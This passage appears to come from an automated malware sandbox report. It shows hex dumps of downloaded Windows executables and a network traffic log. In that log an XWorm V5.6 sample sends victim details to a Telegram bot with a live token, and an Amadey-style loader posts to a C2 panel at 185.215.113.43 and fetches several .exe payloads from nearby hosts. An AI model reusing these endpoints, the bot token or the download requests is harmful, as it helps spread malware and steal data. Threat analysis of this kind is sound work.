20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 06 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 63 79 66 6e 71 66 61 00 40 29 00 00 a0 00 00 00 40 29 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 70 61 71 72 71 73 6a 00 20 00 00 00 e0 29 00 00 06 00 00 00 78 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2a 00 00 22 00 00 00 7e 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:48:07 GMTContent-Type: application/octet-streamContent-Length: 2727936Last-Modified: Fri, 07 Feb 2025 16:03:04 GMTConnection: keep-aliveETag: "67a62eb8-29a000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 0a 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 90 93 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 68 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 06 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 63 79 66 6e 71 66 61 00 40 29 00 00 a0 00 00 00 40 29 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 70 61 71 72 71 73 6a 00 20 00 00 00 e0 29 00 00 06 00 00 00 78 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2a 00 00 22 00 00 00 7e 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:48:08 GMTContent-Type: application/octet-streamContent-Length: 2104320Last-Modified: Fri, 07 Feb 2025 16:05:04 GMTConnection: keep-aliveETag: "67a62f30-201c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 28 a4 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c b9 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c b9 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6b 76 6c 6e 75 77 6d 00 60 19 00 00 60 30 00 00 5e 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 66 67 63 67 72 62 00 10 00 00 00 c0 49 00 00 04 00 00 00 f6 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:48:08 GMTContent-Type: application/octet-streamContent-Length: 2727936Last-Modified: Fri, 07 Feb 2025 16:03:04 GMTConnection: keep-aliveETag: "67a62eb8-29a000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 0a 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 90 93 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 68 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 06 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 63 79 66 6e 71 66 61 00 40 29 00 00 a0 00 00 00 40 29 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 70 61 71 72 71 73 6a 00 20 00 00 00 e0 29 00 00 06 00 00 00 78 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2a 00 00 22 00 00 00 7e 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Feb 2025 16:48:17 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Feb 2025 16:48:17 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00

Source: global traffic	HTTP traffic detected: GET /sok33tn HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bot7567333742:AAHDfYPeN-w99Wqz2UqIryCqnJvB1iXUejw/sendMessage?chat_id=4697473917&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A266ED6D2089A0068F98E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20N52WZ8WV%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sok33tn HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=ff0c59ac5d26287afc_5727703093009439738
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /files/6691015685/1VB7gm8.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 38 35 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1068542001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7788061076/L65uNi1.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 38 37 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1068740001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7788061076/af53YGc.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 38 38 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1068808001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/1097348970/G8lVmiI.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 36 39 33 37 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1069375001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/uniq.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 39 39 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1069932001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/1415984330/MvowLGc.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 39 39 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1069985001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7788061076/af53YGc.exe HTTP/1.1Host: 185.215.113.97If-Modified-Since: Thu, 06 Feb 2025 21:16:33 GMTIf-None-Match: "67a526b1-c6e00"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070029001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7788061076/L65uNi1.exe HTTP/1.1Host: 185.215.113.97If-Modified-Since: Thu, 06 Feb 2025 20:53:42 GMTIf-None-Match: "67a52156-c6e00"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070032001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/1097348970/G8lVmiI.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 37 30 30 33 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1070034001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /testdef/random.exe HTTP/1.1Host: 185.215.113.16
